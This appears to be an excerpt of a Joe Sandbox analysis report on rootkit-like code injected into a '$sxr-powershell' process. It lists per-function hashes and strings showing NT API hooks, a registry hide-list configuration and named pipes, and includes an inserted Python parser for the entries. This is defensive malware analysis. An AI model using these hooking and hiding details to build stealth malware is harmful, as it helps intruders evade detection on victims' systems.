                                                                                                            • Instruction ID: e3f21418bd5b77541e5d6d0a384a6c17b139c78df4a55d6b9b9a897ff846f1a3
                                                                                                            • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction Fuzzy Hash: BCB19132210E92C2EB989F26D4607F9A3A6FB45B84F1458B6EF6953794DF35CD82C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction ID: 8304a4c6edba32c3401fe522ad5f546774d80d5d64c59d086dbdca545ec73518
                                                                                                            • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction Fuzzy Hash: 86316B72201F81CAEB609F61E8607EE7362F784744F44442ADB5E87B99EF38C64AC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction ID: 1fa746262079cc6d0ec37ccfccfb9d7a6af191b68b1a800f0a9a8e7d54888f57
                                                                                                            • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction Fuzzy Hash: 22319E32214F8196EB60DF25E8507EE73A6F788794F540526EBAD43BA9DF38C146CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                            • String ID:
                                                                                                            • API String ID: 1443284424-0
                                                                                                            • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction ID: 75276441b27674de1942e2cb8de842e70413a46d521c01197d1fa73f3824c401
                                                                                                            • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction Fuzzy Hash: 90E12072B04E818AE710CF64D0A06EE7BB2F344798F154166EF6A57BD9DA38C41BE700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                            • API String ID: 3215553584-1407779936
                                                                                                            • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction ID: 697b751569ece7ce55378409b6cefcda17a8125b5cfb8212c3dbe7c076d5a716
                                                                                                            • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction Fuzzy Hash: 0B51DF72B10F9685EF25DFA698206FD27A3FB5ABD8F544535DF2907B85EA38C0428300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: 65a6f1e83847eef1752310cdbdc9ed6844bc014c61e642bb0cea641e464dfee2
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: E9710A36310E52C5EB50AF66E860AEA27A6F784F88F042561DF6D97B28DF38C446C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 4ff74bd60b9250bcf7d07826844fa36db308513573845b04650096b259c1e8fe
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 9C41CE74612E4BE1FB80EB64E871AF66327B704344F8148B3972953572AE79868BC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
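Each entry above is one function from the injected code running inside the renamed PowerShell process, keyed by the IDs Joe Sandbox derives from its API names, strings and opcodes; the same Opcode ID recurring under two memory dumps means the same code at two load addresses. To pivot on those IDs across samples it helps to have the entries as structured data rather than report text. The following Python is an added example written for this page, not Joe Sandbox code: `SAMPLE` is a constructed excerpt in the layout of the entries on this page, and the record field names (`api_tokens`, `string_hash`, `source_file`, ...) are this script's own choice. It also strips the "Download File" link label that the text export glues onto the Associated file names.

```python
"""Parse Joe Sandbox per-function 'Similarity' entries into records.

Added example written for this page, not Joe Sandbox code. SAMPLE is a
constructed excerpt in the layout of the report entries; the record field
names (api_tokens, string_hash, ...) are this script's own choice.
"""
import re
from collections import defaultdict

# Constructed excerpt: three entries, two of which share an Opcode ID but sit in
# different memory dumps. The 'Download File' glued onto one Associated line
# reproduces the link-label residue that the HTML-to-text export leaves behind.
SAMPLE = r"""
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
• API String ID: 2171963597-1213686612
• Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
• Instruction ID: 55eecf24245fc035bbc424791ec3d5224a51302c291f928e9bdfd5dfacb10899
Uniqueness Score: -1.00%
• Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
• Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c
• String ID:
• API String ID: 190073905-0
• Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
• Instruction ID: 1f36a158701bbfe40222895257e19fca7e1ac23139e400764aef04e4f20ddcd5
Uniqueness Score: -1.00%
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c
• String ID:
• API String ID: 190073905-0
• Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
• Instruction ID: 3d1bbe71671d3319355dd47024fef41ac771f7d71745d618a8852743487ddcfc
Uniqueness Score: -1.00%
"""

BULLET_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)")
SCORE_RE = re.compile(r"^\s*Uniqueness Score:\s*(-?[0-9.]+)%")


def _clean(value):
    """Strip the 'Download File' link label the text export glues onto file names."""
    return re.sub(r"Download File$", "", value).strip()


def parse_entries(text):
    """Return one dict per function entry; an entry closes at its Uniqueness Score line."""
    records, cur = [], {"associated": []}
    for line in text.splitlines():
        m = SCORE_RE.match(line)
        if m:
            cur["uniqueness_score"] = float(m.group(1))
            if "opcode_id" in cur:  # a score with no entry in front of it is noise
                records.append(cur)
            cur = {"associated": []}
            continue
        m = BULLET_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), _clean(m.group(2))
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if s:
                cur["source_file"] = s.group("file")
                cur["offset"] = int(s.group("off"), 16)
                cur["based_on_pe"] = s.group("pe").lower() == "true"
        elif key == "Associated":
            cur["associated"].append(value)
        elif key == "API ID":
            # The report joins API-name tokens with '$', so splitting is safe here.
            cur["api_id"] = value
            cur["api_tokens"] = [t for t in value.split("$") if t]
        elif key == "String ID":
            # Also '$'-joined, but the strings themselves contain '$' ('CONOUT$',
            # '\\.\pipe\$sxr...'), so keep the raw value instead of guessing a split.
            cur["string_id"] = value
        elif key == "API String ID":
            api_hash, _, string_hash = value.partition("-")
            cur["api_hash"], cur["string_hash"] = int(api_hash), int(string_hash)
        else:  # Snapshot File, Opcode ID, Instruction ID, fuzzy hashes
            cur[key.lower().replace(" ", "_")] = value
    return records


def shared_opcodes(records):
    """Opcode IDs present in more than one dump: the same code at different load addresses."""
    index = defaultdict(list)
    for r in records:
        index[r["opcode_id"]].append((r["source_file"], r["instruction_id"]))
    return {k: v for k, v in index.items() if len(v) > 1}


if __name__ == "__main__":
    for oid, hits in shared_opcodes(parse_entries(SAMPLE)).items():
        print(oid[:16], "seen in", [f for f, _ in hits])
```

The `String ID` field is deliberately left unsplit: Joe Sandbox uses `$` as the joiner, but several of the strings on this page (`CONOUT$`, `$sxr`, `\\.\pipe\$sxrchildproc...`) contain a literal `$`, so any automatic split would produce wrong tokens. Pivot on `opcode_id` or `api_hash`/`string_hash` instead, which are stable across dumps of the same code.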

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 3f1e02b84af7309447acf28633592ac15a40043614a76fdfa8a67f72611c810a
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: C9516972204F85D3EB54DF62E4587AAB3A2F789F81F489134DBA947B18DF38C0568B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                            • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                            • API String ID: 2171963597-1213686612
                                                                                                            • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction ID: 55eecf24245fc035bbc424791ec3d5224a51302c291f928e9bdfd5dfacb10899
                                                                                                            • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction Fuzzy Hash: 77214136614B41C3FB509B25F4647AA73A2F389B94F541265DB6943BA8DF3CC14ACB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 3a9e7704764545e71621862a6ef60caa6c7505eba9176ba2b1cba4605337d2a0
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: 90417D33214B81D7E7608F62E4547EAB7A2F389B84F048529DB994BB58DF38D566CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 1f36a158701bbfe40222895257e19fca7e1ac23139e400764aef04e4f20ddcd5
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 3E81DF31640E4386FB60AB2698753F967E3EB47780F1484B5ABA5477DADF38C8478700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 3d1bbe71671d3319355dd47024fef41ac771f7d71745d618a8852743487ddcfc
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 34818F31600E4BC9FB90AB6798617FA3693AB85780F184CB59F35877D6DA38C8478710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: 35dfc3aa32dcf8db111c876c6fee45bf4b9fa8742d396846833a13a3022944b0
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: 7A319231212E53E1FF519B12E820BF96296B745BA0F590975EE3D47394EF38C4478300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: 432beadd9ff1d5570b399878e757b42c23d043d2f6db8019e472038e20c33c6f
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: D011BF32310F8186E7509B42E864BAA67A1F388FE5F140274EB2EC7794DF38C806C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: c5e34cd1c125c6e3b3952a4bc3e1c7ca60fc8859c728c7a08bed4d9d710644c7
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 33D19D76218F89C5DB709B1AE4A43AA77A1F788B84F100566EBDD47BA5DF3CC542CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID: $sxr
                                                                                                            • API String ID: 756756679-21942930
                                                                                                            • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction ID: 38f1a088196fad05eee4c8cd52b530c1386e8c9ab981e9f75925f19e634fcf8c
                                                                                                            • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction Fuzzy Hash: 8831B032701F52C2E791EF56E4607B963A2FB44B80F088470DF6843B55EB38C4638700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: c30b3fdf4ce522d273f9f26ba1b90f5b9a4c16ed02a59b89c02ac7fee96110a0
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: B6016D31700F8296EB50EB12E4687AA63A2F788FD0F585474DFA983754DF3CC9868740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 449555515-0
                                                                                                            • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction ID: b4067fa64353e4a98cf70d8bcfaf437134e86d8ca300ac8ae150644a48af0506
                                                                                                            • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction Fuzzy Hash: DA116D75711F4282FB20AB21E469BBA62A6FB49B81F0804B5CF6947354EF3DC00AC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction ID: b249911f766401b9d6ad8824cbb6525cc5d7bd24c6b49d6d7660475476209590
                                                                                                            • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction Fuzzy Hash: E6519A32611A03CAEB95DB15E464BB937A6F344B98F5589B4EF2647788DF34D842C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
• Instruction ID: 47b5d945d2cf1d5e4292b94fd69a8ffd7a6672e9230098f512e373bcd27623f9
• Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
• Instruction Fuzzy Hash: BCF06872304E42D2E7609B11F8A47EA6762F784B88F849074DB5987564DF3CC68EC700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
